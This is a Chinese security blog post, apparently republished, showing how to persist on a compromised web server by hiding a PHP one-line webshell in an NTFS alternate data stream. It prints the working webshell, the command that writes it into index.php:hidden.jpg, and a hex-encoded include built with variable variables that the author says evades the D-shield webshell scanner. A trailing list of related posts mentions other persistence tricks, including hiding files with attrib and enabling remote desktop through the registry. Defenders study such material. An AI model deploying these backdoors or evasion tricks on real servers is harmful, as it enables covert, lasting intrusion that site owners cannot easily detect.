【web端权限维持】利用ADS隐藏webshell

最新推荐文章于 2024-10-23 16:41:40 发布
最新推荐文章于 2024-10-23 16:41:40 发布
阅读量106 收藏
点赞数
原文链接:http://www.cnblogs.com/xiaozi/p/7610984.html
版权

0X01 前言

  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。

0X02 利用ADS隐藏webshell

  关于ADS的介绍,就不再阐述,详见尾部参考资料。

  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。

       制作步骤一:创建ADS隐藏文件

       在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:  

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

  这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。   

       问题1:如何查看index.php:hidden.jpg内容呢?

  进入文件所在目录,notepad index.php:hidden.jpg    或者 dir /r

  问题2:如何删除index.php:hidden.jpg?

       直接删除index.php即可

       制作步骤二:文件包含

  一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:hidden.jpg’)?>,这样子就可以正常解析我们的一句话了。

  但是却非常容易被webshell查杀工具查到,看到可疑引用的文件名,分分钟出局了。

  

 

  制作步骤三:如何绕过检测

  这边要解决的是include函数,如何让它检测不出来有可疑引用文件呢?

  在某次应急响应事件中,获取到一段代码,这里拿来改造一下。代码如下:

<?php
@include(PACK('H*','xx'));
?>

  PHP pack() 函数 函数介绍:http://www.w3school.com.cn/php/func_misc_pack.asp

  将index.php:hidden.jpg进行hex编码

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

  再次用D盾_web查杀进行扫描,还是被查到了。

  

  进一步利用PHP 可变变量进行二次转换,最后得到绕过D盾扫描的姿势如下:

<?php 
$a="696E6465782E7068703"."A68696464656E2E6A7067";
$b="a";
include(PACK('H*',$$b))
?>

绕过D盾_web查杀如图:

0X03 最后

  权限维持,也是一门很重要的课题,熟悉各种常见的后门技术,并懂得如何进行安全防御。

 

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

参考文章:

NTFS中的ADS的一些问题  https://www.i0day.com/733.html

一个用ADS(供选数据流)隐藏Windows后门的方法  http://www.freebuf.com/articles/73270.html

Windows中隐藏文件的捷径---------NTFS文件流(ADS)  http://blog.csdn.net/c395565746c/article/details/5336260

转载于:https://www.cnblogs.com/xiaozi/p/7610984.html

an0708
关注
内网权限维持 —— 后门
战神/calmness的博客
12-09 1204
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
初探ADS文件隐写术
知远同学的博客
07-11 1386
文件隐写技术分为很多种,今天笔者给大家介绍一种依靠ADS文件进行文件隐藏的技术,原理在这里就不详细介绍了,比较枯燥的内容就略过吧,我们看看是如何实现的。 在电脑C盘,文件名为“plan”的文件夹内有两个文件,一个是文件名为“2.jpg”的图片文件,一个是文件名为“plan.txt”的文本文档, 现在我们要把这个图片文件隐藏到文本文件中去。 打开CMD,通过命令将“2.JPG”隐藏到“plan.txt”文本文本中去: 关键命令为:type 2.jpg > plan.txt 通过这样的..
利用三种方式实现windows下的文件隐藏
m0_66061261的博客
05-26 1052
windows文件隐藏的三种方式
应急响应实战笔记——权限维持篇:① Windows权限维持&隐藏
君逍遥o
03-28 962
攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。
权限维持】Window下的几种隐藏技术
08-19 772
0x00 前言攻击者在获取服务器权限后,通常会用一些后门来维持权限。如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。0x01 隐藏文件1、利用文件属...
linux木马 权限维持位置,权限维持——牧马隐藏技巧
weixin_39782500的博客
04-30 426
本文仅作学习记录,如有侵权,请联系删除!修改文件属性:Windows使用attrib命令,参数说明如下:+r 设置只读属性-r 取消只读属性+a 设置存档属性-a 取消存档属性+s 设置系统属性-s 取消系统属性+h 设置隐藏属性-h 取消隐藏属性/s 显示目录下所有文件的属性/d 将attrib和任意命令行选项应用到目录attrib +s +h webshell.php即使开启了显示隐藏的文...
运用iGuard防御ADS权限维持
天存信息
05-28 702
运用iGuard防御ADS权限维持一、NTFS文件系统 & ADS特性1. NTFS/ADS 是什么?2. ADS 怎么用?二、如何利用ADS特性隐藏恶意文件三、防御ADS数据流隐藏Webshell的手法 权限维持是一门庞大的学问,当攻击者在入侵服务器获得主机权限后,往往会想尽办法隐藏其入侵途径以维持权限权限维持的一般手段包括构造文件包含漏洞、构造远程任意代码执行漏洞、构造SQL注入点、...
第8章权限维持分析及防御
willow_liang的博客
12-30 2006
第8章权限维持分析及防御 后门是一个留在目标主机上的软件,它可以使攻击者随时与目标主机进行连接。在大多数情况下,后门是一个运行在目标主机上的隐藏进程。因为后门可能允许一个普通的授权的用户控制计算机,所以攻击者经常使用后门来控制服务器。攻击者在提升权限之后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统。因此如果我们能够了解攻击者在系统中建立后门的方法和思路,就可以在发现系统被人侵后快速找到攻击者留下的后门并将其清除。 .
mysql ntfs 提权 (errcode: 22)_NTFS ADS带来的WEB安全问题
weixin_35837856的博客
02-17 343
如今的文件上传漏洞突破日益困难,各种花式绕过方式也被防御的死死的,但想必NTFS ADS这种在实战中用到的还是相对较少,尤其是它所附带的后门隐藏效果,对于我们在日常渗透中也会有很大助益,这里分享一篇关于此的文章。注:文中图片均可点击放大查看!看不清楚直接点击查看即可!可以看到ADS在很久以前就被一些安全人员所关注,并且也提出了一些经典的利用,比如隐藏文件隐藏webshell(http://blo...
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF提权
weixin_54626591的博客
10-23 24
利用MSF对MYSQL进行简单的UDF提权
php后门文件处理方式_PHP后门隐藏的一些技巧总结
weixin_33760049的博客
03-09 919
前言如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。1、隐藏文件使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。attrib +s +a +h +r shell.php //隐藏shell.php文件2、修改文件时间属性当你试图在一...
红队&蓝队&免杀&隐藏文件&横向渗透
Scorpio_m7
03-27 739
1-head请求 在蓝队防守前期要关注扫描行为,HEAD请求头只有两行,响应头较短,无请求体和响应体,速度快,多用于探测页面是否存在,例子: HEAD /edit/db/ HTTP/1.1 Host:220.181.38.150 2-命令开远控 在红队队成功连接webshell后,上传mimikatz,通过mimikatz获取当前主机用户名密码,通过以下命令修改注册表远程开启目标windows的3389口,实现远程连接。 REG ADD HKLM\SYSTEM\CurrentControlSet\Con
芋道管理后台,基于 vben 最新版本,最新的 vue3 vite4 ant-design-vue 4.0 typescript
10-31
ruoyi-vue-pro-vben 芋道管理后台,基于 vben 最新版本,最新的 vue3 vite4 ant-design-vue 4.0 typescript 语法进行重构开发,支持 springboot3 springcloud 版本
长春工程学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
yolo算法-自动驾驶道路交通锥数据集-110张图像带标签-蓝黄色automatic-v62ff.zip
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
基于Java语言开发的fruits_manager_system水果管理系统设计源码
最新发布
11-01
该项目是一个基于Java语言开发的水果管理系统设计源码,包含53个文件,其中包括30个Java源文件、13个XML配置文件、6个JAR包文件、1个Git忽略文件、1个属性文件以及1个SQL脚本文件。此系统旨在用于期末答辩展示,展示了开发者对Java编程和系统设计的深入理解。
java回顾、知识整理、拾遗、面试_java-review.zip
10-31
java回顾、知识整理、拾遗、面试_java-review
用struts2,spring,hibernate框架,搭建在线考试系统 网站支持(1)老师创建题库,创建题目,查看题目对题目进
10-31
mysql主从复制用struts2,spring,hibernate框架,搭建在线考试系统。网站支持(1)老师创建题库,创建题目,查看题目对题目进行增删改,发布考试(选择考试难中易比例),批改学生试卷,查看学生成绩。(.zip
渗透测试中的权限维持技术
在Linux相关的权限维持中,攻击者可以使用Webshell、SSH隧道、计划任务等方法来维持对系统的控制权。Webshell是指攻击者在目标系统上创建的一个Webshell,以便可以远程控制系统。SSH隧道是指攻击者在目标系统上创建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值